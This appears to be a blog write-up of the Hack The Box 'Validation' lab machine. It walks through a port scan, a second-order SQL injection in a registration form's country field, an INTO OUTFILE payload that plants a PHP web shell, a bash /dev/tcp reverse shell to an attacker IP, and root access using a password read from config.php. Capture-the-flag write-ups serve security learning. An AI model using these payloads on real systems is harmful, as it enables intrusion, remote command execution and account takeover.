HTB Validation writeup

In this tutorial we will get root access for the Validation machine from Hack The Box.

TLDR

  1. 1. Run port scan
  2. 2. Find web app on port 80
  3. 3. Find 2nd order SQLi in the country param.
  4. 4. Upload a web shell as DB user has FILE permission.
  5. 5. Create a reverse shell.
  6. 6. Find root password in the /var/www/html/config.php file.

Walkthrough

At first we run the port scan nmap -p1-65535 -v 10.10.11.116:

If we open http://10.10.11.116:80 we will see a registration page:

When you register a new user you are redirected to the account.php page with a list of all users. When you intercept the request there are 2 params being sent: username and country:

Country parameter is prone to 2nd order SQLi. If you pass country’ in the account.php page you will see an error:

It means that the malicious country parameter is saved into DB and later used in other SQL query.

Now we can upload a webshell using SQLi as our user has FILE permission in the DB. Use the following SQL statement to create a web shell: username=test3&country=Aruba' UNION SELECT "<?php SYSTEM($_REQUEST['cmd']) ?>" INTO OUTFILE "/var/www/html/myshell.php"-- -:

Now if you open http://10.10.11.116/myshell.php?cmd=id you should see:

Now we should establish a reverse shell. Start nc listener on your local machine:

Establish a reverse session using web shell: http://10.10.11.116/myshell.php?cmd=bash+-c+%27bash+-i+%3E%26+/dev/tcp/10.10.14.60/9090+0%3E%261%27

You should get a back connection:

In the /var/www/html you can find a config.php file with password. This password can also be used for root user:

Leave a Reply

Your email address will not be published. Required fields are marked *